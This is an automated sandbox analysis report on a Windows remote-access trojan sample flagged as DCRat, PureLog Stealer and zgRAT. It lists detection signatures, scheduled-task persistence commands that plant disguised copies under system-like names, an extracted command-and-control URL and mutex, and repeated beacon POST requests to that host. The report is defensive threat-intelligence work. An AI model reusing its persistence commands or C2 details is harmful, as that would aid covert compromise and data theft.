Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0JLWNg4Sz1.exe

Overview

General Information

Sample name:0JLWNg4Sz1.exe
renamed because original name is a hash value
Original sample name:844679E76D8254BEDD67C98610F7D7AC.exe
Analysis ID:1545098
MD5:844679e76d8254bedd67c98610f7d7ac
SHA1:4222ebbb055830096b829f072783423dbe255932
SHA256:9b08f03985d3378123ba236fae1b41b42fcc9af87932655a5120e04fa9a21942
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 0JLWNg4Sz1.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\0JLWNg4Sz1.exe" MD5: 844679E76D8254BEDD67C98610F7D7AC)
    • schtasks.exe (PID: 7652 cmdline: schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7676 cmdline: schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7700 cmdline: schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7728 cmdline: schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7752 cmdline: schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7792 cmdline: schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7820 cmdline: schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 9 /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7860 cmdline: schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7884 cmdline: schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 12 /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7908 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7936 cmdline: schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7968 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7996 cmdline: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 8020 cmdline: schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 8044 cmdline: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 8068 cmdline: schtasks.exe /create /tn "0JLWNg4Sz10" /sc MINUTE /mo 10 /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 8092 cmdline: schtasks.exe /create /tn "0JLWNg4Sz1" /sc ONLOGON /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 8116 cmdline: schtasks.exe /create /tn "0JLWNg4Sz10" /sc MINUTE /mo 14 /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 8144 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7164 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7212 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • DViaOgnvmAhwCXZ.exe (PID: 7760 cmdline: "C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe" MD5: 844679E76D8254BEDD67C98610F7D7AC)
  • DViaOgnvmAhwCXZ.exe (PID: 7784 cmdline: "C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe" MD5: 844679E76D8254BEDD67C98610F7D7AC)
  • 0JLWNg4Sz1.exe (PID: 7320 cmdline: C:\Users\user\Desktop\0JLWNg4Sz1.exe MD5: 844679E76D8254BEDD67C98610F7D7AC)
  • 0JLWNg4Sz1.exe (PID: 7332 cmdline: C:\Users\user\Desktop\0JLWNg4Sz1.exe MD5: 844679E76D8254BEDD67C98610F7D7AC)
  • smartscreen.exe (PID: 7304 cmdline: "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe" MD5: 844679E76D8254BEDD67C98610F7D7AC)
  • smartscreen.exe (PID: 7344 cmdline: "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe" MD5: 844679E76D8254BEDD67C98610F7D7AC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://977255cm.nyashkoon.in/secureWindows", "MUTEX": "DCR_MUTEX-sKFQIzXKnAf7PnSalSzG"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
0JLWNg4Sz1.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    0JLWNg4Sz1.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000000.00000000.1665110989.0000000000FA2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        00000000.00000002.1708169450.0000000013471000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 3 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.0JLWNg4Sz1.exe.fa0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.0.0JLWNg4Sz1.exe.fa0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Files With System Process Name In Unsuspected Locations
                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\0JLWNg4Sz1.exe, ProcessId: 7556, TargetFilename: C:\Program Files (x86)\microsoft\Edge\smartscreen.exe
                              Sigma detected: System File Execution Location Anomaly
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe", CommandLine: "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe", ProcessId: 7304, ProcessName: smartscreen.exe

                              Persistence and Installation Behavior

                              barindex
                              Sigma detected: Schedule system process
                              Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /f, CommandLine: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\0JLWNg4Sz1.exe", ParentImage: C:\Users\user\Desktop\0JLWNg4Sz1.exe, ParentProcessId: 7556, ParentProcessName: 0JLWNg4Sz1.exe, ProcessCommandLine: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /f, ProcessId: 7996, ProcessName: schtasks.exe

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-30T05:22:07.511045+010020480951A Network Trojan was detected192.168.2.449730188.114.96.380TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: 0JLWNg4Sz1.exeAvira: detected
                              Antivirus detection for dropped file
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\AppData\Local\Temp\oLZ05R153F.batAvira: detection malicious, Label: BAT/Delbat.C
                              Source: C:\Recovery\StartMenuExperienceHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Found malware configuration
                              Source: 00000000.00000002.1708169450.0000000013471000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://977255cm.nyashkoon.in/secureWindows", "MUTEX": "DCR_MUTEX-sKFQIzXKnAf7PnSalSzG"}
                              Multi AV Scanner detection for dropped file
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeReversingLabs: Detection: 65%
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeReversingLabs: Detection: 65%
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeReversingLabs: Detection: 65%
                              Source: C:\Recovery\DViaOgnvmAhwCXZ.exeReversingLabs: Detection: 65%
                              Source: C:\Recovery\StartMenuExperienceHost.exeReversingLabs: Detection: 65%
                              Source: C:\Users\user\Desktop\ALzNWdSZ.logReversingLabs: Detection: 23%
                              Source: C:\Users\user\Desktop\KjTCumlu.logReversingLabs: Detection: 23%
                              Multi AV Scanner detection for submitted file
                              Source: 0JLWNg4Sz1.exeReversingLabs: Detection: 65%
                              Source: 0JLWNg4Sz1.exeVirustotal: Detection: 56%Perma Link
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for dropped file
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeJoe Sandbox ML: detected
                              Source: C:\Recovery\StartMenuExperienceHost.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: 0JLWNg4Sz1.exeJoe Sandbox ML: detected
                              Source: 0JLWNg4Sz1.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: 0JLWNg4Sz1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 188.114.96.3:80
                              Uses ping.exe to check the status of other devices and networks
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
